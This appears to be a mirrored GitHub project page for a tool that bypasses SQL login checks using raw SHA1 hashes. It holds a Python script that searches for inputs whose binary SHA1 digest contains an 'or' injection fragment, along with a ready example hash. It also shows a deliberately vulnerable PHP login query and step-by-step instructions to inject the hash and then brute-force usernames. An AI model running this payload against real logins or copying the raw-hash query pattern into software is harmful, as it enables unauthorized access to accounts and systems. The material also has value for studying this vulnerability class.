Docker>> SHA1_RAW_SQL_INJECTION>> 返回
项目作者: 0xJohannes

项目描述 :
Sql injection with raw sha1 hashes.
高级语言:
项目地址: git://github.com/0xJohannes/SHA1_RAW_SQL_INJECTION.git
创建时间: 2018-09-10T09:55:47Z
项目社区:https://github.com/0xJohannes/SHA1_RAW_SQL_INJECTION
开源协议:
下载


raw sha1 sql injection example hashes

Hash string SHA1 Hash Raw output Query Author
5651578060603509 96009c0bafe7be05e23b0079226f7222d82fee88 E&�ɶ��’\ \ ‘8�vjc\� ‘\ \ ‘8 0xJohannes

PAYLOAD GENERATION

  1. #!/usr/bin/python
  2.  # -*- coding: utf-8 -*
  3. import hashlib
  4. import re
  5. a = re.compile("'or'\d")
  6. b = re.compile("'\|\|'\d")
  7. d = re.compile("'OR'\d")
  8. e = re.compile("'Or'\d")
  9. f = re.compile("'oR'\d")
  10. from random import randint
  12. identifier = True
  13. while identifier:
  14.     rand=randint(0, 10000)
  15.     rand1=randint(0, 10000)
  16.     rand2=randint(0, 10000)
  17.     rand3=randint(0, 10000)
  18.     value='{}{}{}{}'.format(rand,rand1,rand2,rand3)
  19.     hashed = hashlib.sha1(value).digest()
  20.     hastrip = hashed.strip()
  21.     print hastrip
  22.     if a.search(hastrip)!=None or b.search(hastrip)!=None or d.search(hastrip)!=None or e.search(hastrip)!=None or f.search(hastrip)!=None:
  23.         identifier = False
  24.         print hashed
  25.         print value
  26.         break

EXAMPLE USAGE

  1. <?php
  3. ...SOME CODE...
  5. function escape_sql()
  6.   {
  7.     ...sql escape...
  8.   }
  10. $pass = sha1($_POST['pass'], true);
  12. $log = escape_sql($_POST['log']);
  14. $sql = "select * from tablename where password=$pass AND username=$log";
  16. ...SOME CODE...
  17. ?>
  • The first step is to inject one of suitable hashes.
  • The second move is bruteforcing the login value i.e. (admin, 4dm1n and so on)
  • The final step is buying me a coffee :D Coffee